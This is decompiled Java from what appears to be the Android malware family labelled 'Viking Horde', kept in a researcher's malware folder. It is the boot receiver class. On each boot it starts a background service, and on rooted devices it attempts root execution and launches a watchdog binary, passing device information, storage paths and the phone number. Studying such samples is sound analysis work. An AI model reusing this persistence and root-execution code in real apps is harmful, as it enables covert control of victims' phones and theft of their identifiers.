package com.fa.c;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Environment;
import android.util.Log;
import java.io.File;

public class BootReceiver
  extends BroadcastReceiver
{
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    int i = Utilities.GetInstallType(paramContext.getApplicationContext());
    if (i == 0) {
      paramContext.startService(new Intent(paramContext.getApplicationContext(), SystemService.class));
    }
    for (;;)
    {
      return;
      if (i == 1) {
        try
        {
          if ((RootUtil.isDeviceRooted()) && (!new ExecuteAsRootOnStart(paramContext).execute()))
          {
            Runtime.getRuntime().exec("/data/" + Utilities.GetWatchDogName(paramContext.getApplicationContext()) + " " + Utilities.GetDeviceInfoCommandLineArgs(paramContext.getApplicationContext()) + " /data/" + Utilities.GetExecName(paramContext.getApplicationContext()) + " " + Environment.getExternalStorageDirectory().getAbsolutePath() + File.separator + Utilities.GetExchangeFileName(paramContext.getApplicationContext()) + " " + Environment.getExternalStorageDirectory().getAbsolutePath() + File.separator + " " + Utilities.GetPhoneNumber(paramContext));
            return;
          }
        }
        catch (Exception paramIntent)
        {
          Log.d("CPS", paramIntent.getMessage());
          try
          {
            Runtime.getRuntime().exec("/data/" + Utilities.GetWatchDogName(paramContext.getApplicationContext()) + " " + Utilities.GetDeviceInfoCommandLineArgs(paramContext.getApplicationContext()) + " /data/" + Utilities.GetExecName(paramContext.getApplicationContext()) + " " + Environment.getExternalStorageDirectory().getAbsolutePath() + File.separator + Utilities.GetExchangeFileName(paramContext.getApplicationContext()) + " " + Environment.getExternalStorageDirectory().getAbsolutePath() + File.separator + " " + Utilities.GetPhoneNumber(paramContext));
            return;
          }
          catch (Exception paramContext)
          {
            Log.d("CPS", paramIntent.getMessage());
            return;
          }
        }
      }
    }
    Log.d("CPS", "NOT INSTALLED");
  }
}


/* Location:              /home/enzo/Documents/hacking/malwares/viking-horde/classes.jar!/com/fa/c/BootReceiver.class
 * Java compiler version: 6 (50.0)
 * JD-Core Version:       0.7.1
 */